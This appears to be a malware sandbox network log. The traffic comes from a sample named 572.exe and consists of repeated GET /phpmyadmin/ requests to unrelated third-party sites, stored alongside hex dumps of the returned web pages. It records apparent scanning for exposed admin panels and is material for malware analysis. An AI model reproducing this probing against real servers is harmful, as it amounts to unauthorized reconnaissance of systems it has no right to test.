                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: s-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-fon
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 61 6d 65 22 3e 43 6f 6e 74 61 63 74 20 55 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 0d 0a 09 09 0d 0a 0d 0a 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 68 65 61 64 65 72 2d 31 2d 77 72 61 70 70 65 72 20 68 65 61 64 65 72 2d 6d 61 69 6e 2d 61 72 65 61 22 3e 09 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 63 65 2d 72 65 73 2d 6e 61 76 22 3e 0d 0a 09 3c 61 20 63 6c 61 73 73 3d 22 76 63 65 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6e 61 76 22 20 68 72 65 66 3d 22 23 73 69 64 72 2d 6d 61 69 6e 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 62 61 72 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 3c 2f 64 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ame">Contact Us</span></a></li></ul></div></div></div></div><div class="container header-1-wrapper header-main-area"><div class="vce-res-nav"><a class="vce-responsive-nav" href="#sidr-main"><i class="fa fa-bars"></i></a></di
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 74 26 26 28 22 62 65 66 6f 72 65 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 62 65 66 6f 72 65 3a 22 61 66 74 65 72 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 61 66 74 65 72 3a 22 70 72 65 70 65 6e 64 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 70 72 65 70 65 6e 64 3a 22 61 70 70 65 6e 64 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 61 70 70 65 6e 64 3a 22 72 65 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 72 65 70 6c 61 63 65 5f 63 6f 6e 74 65 6e 74 3a 22 72 65 70 6c 61 63 65 2d 65 6c 65 6d 65 6e 74 22 3d 3d 61 26 26 28 72 3d 61 69 5f 66 72 6f 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t&&("before"==a?r=ai_front.insertion_before:"after"==a?r=ai_front.insertion_after:"prepend"==a?r=ai_front.insertion_prepend:"append"==a?r=ai_front.insertion_append:"replace-content"==a?r=ai_front.insertion_replace_content:"replace-element"==a&&(r=ai_front
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC793INData Raw: 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 22 6c 6f 61 64 69 6e 67 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 26 26 21 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 6f 53 63 72 6f 6c 6c 3f 62 28 29 3a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 62 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 69 5f 70 72 6f 63 65 73 73 5f 72 6f 74 61 74 69 6f 6e 73 28 29 7d 2c 0a 31 30 29 7d 29 3b 61 69 5f 70 72 6f 63 65 73 73 5f 65 6c 65 6d 65 6e 74 73 5f 61 63 74 69 76 65 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 44 28 29 7b 61 69 5f 70 72 6f 63 65 73 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ent.readyState||"loading"!==document.readyState&&!document.documentElement.doScroll?b():document.addEventListener("DOMContentLoaded",b)})(function(){setTimeout(function(){ai_process_rotations()},10)});ai_process_elements_active=!1;function D(){ai_process
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1368INData Raw: 64 37 32 33 0d 0a 31 3d 3d 61 69 5f 74 72 61 63 6b 69 6e 67 5f 66 69 6e 69 73 68 65 64 26 26 61 69 5f 69 6e 73 74 61 6c 6c 5f 63 6c 69 63 6b 5f 74 72 61 63 6b 65 72 73 28 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 69 5f 69 6e 73 74 61 6c 6c 5f 63 6c 6f 73 65 5f 62 75 74 74 6f 6e 73 26 26 61 69 5f 69 6e 73 74 61 6c 6c 5f 63 6c 6f 73 65 5f 62 75 74 74 6f 6e 73 28 64 6f 63 75 6d 65 6e 74 29 7d 2c 35 29 3b 61 69 5f 70 72 6f 63 65 73 73 5f 65 6c 65 6d 65 6e 74 73 5f 61 63 74 69 76 65 3d 21 30 7d 7d 3b 0a 3b 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 26 26 6e 75 6c 6c 21
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: d7231==ai_tracking_finished&&ai_install_click_trackers();"function"==typeof ai_install_close_buttons&&ai_install_close_buttons(document)},5);ai_process_elements_active=!0}};;!function(a,b){a(function(){"use strict";function a(a,b){return null!=a&&null!
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC14994INData Raw: 58 6f 6f 6d 7c 48 52 49 33 39 7c 4d 4f 54 2d 7c 41 31 32 36 30 7c 41 31 36 38 30 7c 41 35 35 35 7c 41 38 35 33 7c 41 38 35 35 7c 41 39 35 33 7c 41 39 35 35 7c 41 39 35 36 7c 4d 6f 74 6f 72 6f 6c 61 2e 2a 45 4c 45 43 54 52 49 46 59 7c 4d 6f 74 6f 72 6f 6c 61 2e 2a 69 31 7c 69 38 36 37 7c 69 39 34 30 7c 4d 42 32 30 30 7c 4d 42 33 30 30 7c 4d 42 35 30 31 7c 4d 42 35 30 32 7c 4d 42 35 30 38 7c 4d 42 35 31 31 7c 4d 42 35 32 30 7c 4d 42 35 32 35 7c 4d 42 35 32 36 7c 4d 42 36 31 31 7c 4d 42 36 31 32 7c 4d 42 36 33 32 7c 4d 42 38 31 30 7c 4d 42 38 35 35 7c 4d 42 38 36 30 7c 4d 42 38 36 31 7c 4d 42 38 36 35 7c 4d 42 38 37 30 7c 4d 45 35 30 31 7c 4d 45 35 30 32 7c 4d 45 35 31 31 7c 4d 45 35 32 35 7c 4d 45 36 30 30 7c 4d 45 36 33 32 7c 4d 45 37 32 32 7c 4d 45 38 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Xoom|HRI39|MOT-|A1260|A1680|A555|A853|A855|A953|A955|A956|Motorola.*ELECTRIFY|Motorola.*i1|i867|i940|MB200|MB300|MB501|MB502|MB508|MB511|MB520|MB525|MB526|MB611|MB612|MB632|MB810|MB855|MB860|MB861|MB865|MB870|ME501|ME502|ME511|ME525|ME600|ME632|ME722|ME81
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 50 54 31 33 7c 53 47 50 54 31 31 34 7c 53 47 50 54 31 32 31 7c 53 47 50 54 31 32 32 7c 53 47 50 54 31 32 33 7c 53 47 50 54 31 31 31 7c 53 47 50 54 31 31 32 7c 53 47 50 54 31 31 33 7c 53 47 50 54 31 33 31 7c 53 47 50 54 31 33 32 7c 53 47 50 54 31 33 33 7c 53 47 50 54 32 31 31 7c 53 47 50 54 32 31 32 7c 53 47 50 54 32 31 33 7c 53 47 50 33 31 31 7c 53 47 50 33 31 32 7c 53 47 50 33 32 31 7c 45 42 52 44 31 31 30 31 7c 45 42 52 44 31 31 30 32 7c 45 42 52 44 31 32 30 31 7c 53 47 50 33 35 31 7c 53 47 50 33 34 31 7c 53 47 50 35 31 31 7c 53 47 50 35 31 32 7c 53 47 50 35 32 31 7c 53 47 50 35 34 31 7c 53 47 50 35 35 31 7c 53 47 50 36 32 31 7c 53 47 50 36 34 31 7c 53 47 50 36 31 32 7c 53 4f 54 33 31 7c 53 47 50 37 37 31 7c 53 47 50 36 31 31 7c 53 47 50 36 31 32 7c 53
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: PT13|SGPT114|SGPT121|SGPT122|SGPT123|SGPT111|SGPT112|SGPT113|SGPT131|SGPT132|SGPT133|SGPT211|SGPT212|SGPT213|SGP311|SGP312|SGP321|EBRD1101|EBRD1102|EBRD1201|SGP351|SGP341|SGP511|SGP512|SGP521|SGP541|SGP551|SGP621|SGP641|SGP612|SOT31|SGP771|SGP611|SGP612|S
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 5c 2d 73 7c 64 65 76 69 7c 64 69 63 61 7c 64 6d 6f 62 7c 64 6f 28 63 7c 70 29 6f 7c 64 73 28 31 32 7c 5c 2d 64 29 7c 65 6c 28 34 39 7c 61 69 29 7c 65 6d 28 6c 32 7c 75 6c 29 7c 65 72 28 69 63 7c 6b 30 29 7c 65 73 6c 38 7c 65 7a 28 5b 34 2d 37 5d 30 7c 6f 73 7c 77 61 7c 7a 65 29 7c 66 65 74 63 7c 66 6c 79 28 5c 2d 7c 5f 29 7c 67 31 20 75 7c 67 35 36 30 7c 67 65 6e 65 7c 67 66 5c 2d 35 7c 67 5c 2d 6d 6f 7c 67 6f 28 5c 2e 77 7c 6f 64 29 7c 67 72 28 61 64 7c 75 6e 29 7c 68 61 69 65 7c 68 63 69 74 7c 68 64 5c 2d 28 6d 7c 70 7c 74 29 7c 68 65 69 5c 2d 7c 68 69 28 70 74 7c 74 61 29 7c 68 70 28 20 69 7c 69 70 29 7c 68 73 5c 2d 63 7c 68 74 28 63 28 5c 2d 7c 20 7c 5f 7c 61 7c 67 7c 70 7c 73 7c 74 29 7c 74 70 29 7c 68 75 28 61 77 7c 74 63 29 7c 69 5c 2d 28 32 30 7c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: \-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                63192.168.2.654854104.18.41.153443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC342INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7368b6139b-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC168INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                64192.168.2.65462223.4.32.216443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC202INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://steamcommunity.com
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                65192.168.2.652524124.237.208.37443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC652INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: "62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900799866678868342
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=28BC2B6ED4C1D9D9F81E1A842D564B3F:FG=1; expires=Tue, 04-Feb-25 11:14:52 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900799866678868342
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW+iw9QE0XaisBS3b+qnFNveUfQhz9owpNwyaGzq/uEjV2eCc=
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC527INData Raw: 64 36 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e e9 a1 b5 e9 9d a2 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 70 61 6e 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 70 72 65 73 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 70 61 6e 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 70 72 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: d69<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><title></title><link href="//pan.baidu.com/ppres/static/images/favicon.ico" rel="shortcut icon"><link rel="stylesheet" type="text/css" href="//pan.baidu.com/ppre
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC2358INData Raw: 61 64 65 72 2f 6d 6f 64 75 6c 65 5f 68 65 61 64 65 72 2e 6a 73 3f 74 3d 32 30 31 33 30 33 32 31 32 39 33 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 34 30 34 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 64 6f 63 5f 6d 61 69 6e 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 68 64 2d 6d 61 69 6e 20 63 6c 65 61 72 66 69 78 22 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 66 2d 69 63 6f 6e 2d 6c 6f 67 6f 20 6c 6f 67 6f 22 20 68 72 65 66 3d 22 2f 2f 79 75 6e 2e 62 61 69 64 75 2e 63 6f 6d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 2f 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ader/module_header.js?t=201303212934"></script></head><body class="error-404"><div id="doc_main"> <header class="hd-main clearfix" id="header"> <a class="f-icon-logo logo" href="//yun.baidu.com" xmlns="http://www.w3.org/1999/xhtml"></a
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC555INData Raw: 22 3e e6 88 91 e7 9a 84 e5 b0 8f e5 ba a6 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 63 6c 61 73 73 3d 22 70 75 6c 6c 64 6f 77 6e 2d 63 61 6e 76 61 73 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "></span> </a> </div> <iframe class="pulldown-canvas" frameborder="0" scrolling="no"></iframe> </div> </div> </nav> <div class="
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC4094INData Raw: 66 66 37 0d 0a 64 65 66 61 75 6c 74 2d 74 65 78 74 20 68 61 73 2d 70 75 6c 6c 64 6f 77 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 65 6d 20 63 6c 61 73 73 3d 22 66 2d 69 63 6f 6e 20 70 75 6c 6c 2d 61 72 72 6f 77 22 3e 3c 2f 65 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 72 65 22 20 68 69 64 65 66 6f 63 75 73 3d 22 68 69 64 65 46 6f 63 75 73 22 3e e6 9b b4 e5 a4 9a 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 75 6c 6c 64 6f 77 6e 20 6d 6f 72 65 2d 69 6e 66 6f 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 66
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ff7default-text has-pulldown"> <em class="f-icon pull-arrow"></em> <span class="more" hidefocus="hideFocus"></span> <div class="pulldown more-info" style="display: none;"> <if
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                66192.168.2.65508644.233.131.115443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cloud.simplify3d.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC216INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 6854
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC6854INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Page Not Found</title><meta name="description" co


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                67192.168.2.655113172.203.148.34443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: eei.uniandes.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC162INHTTP/1.1 401
                                                                                                                                                                                                                                                                                                                                                                WWW-Authenticate: realm user=""
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
